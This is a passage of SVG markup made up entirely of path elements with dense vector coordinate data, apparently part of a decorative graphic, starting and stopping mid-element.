-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path 